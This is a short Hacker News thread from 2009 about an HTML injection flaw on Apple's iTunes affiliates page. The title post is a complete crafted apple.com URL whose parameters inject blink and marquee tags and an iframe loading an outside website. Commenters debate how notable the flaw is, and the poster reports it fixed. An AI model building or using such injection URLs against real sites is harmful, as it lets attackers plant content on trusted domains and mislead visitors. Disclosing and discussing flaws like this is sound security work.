

ITunes website open to HTML injection...again (lgt example). [WARNING: autoplay] - blhack
http://www.apple.com/uk/itunes/affiliates/download/?artistName=%3Cblink%3EApple%20%3Cmarquee%3E%3Cbr/%3E%20%3Ciframe%20src=http%3A%2F%2Fwww.sharperfx.com%2Fnb1%2F%20width=800%20height=400%3E%3C/iframe%3E&thumbnailUrl=http%3A//images.apple.com/home/images/promo_mac_ads_20091022.jpg&itmsUrl=http%3A%2F%2Fitunes.apple.com%2FWebObjects%2FMZStore.woa%2Fwa%2FviewAlbum%3Fid%3D330407877%26s%3D143444%26ign-mscache%3D1&albumName=%3Cblink%3Ea%20wide-open%20HTML%20injection%20hole

======
blhack
Credit to SSChicken who pointed this out in a reddit comment thread.

Permalink to their commment:

[http://www.reddit.com/r/technology/comments/a5osy/oh_apple_w...](http://www.reddit.com/r/technology/comments/a5osy/oh_apple_when_will_you_learn/c0fypfm)

------
tptacek
And this is interesting because...?

~~~
roc
Because we'd like to think professionals (particularly those who flog their
platforms' security) would validate their input, in this, the year 2009.

~~~
tptacek
What vendor has not had similar problems in 2009? What's the vendor that says
_negative_ things about their own security?

------
blhack
Well, it looks as though they have fixed it for now. Apple, this is
depressing.

------
calebgilbert
Somehow I never tire of these. :-)

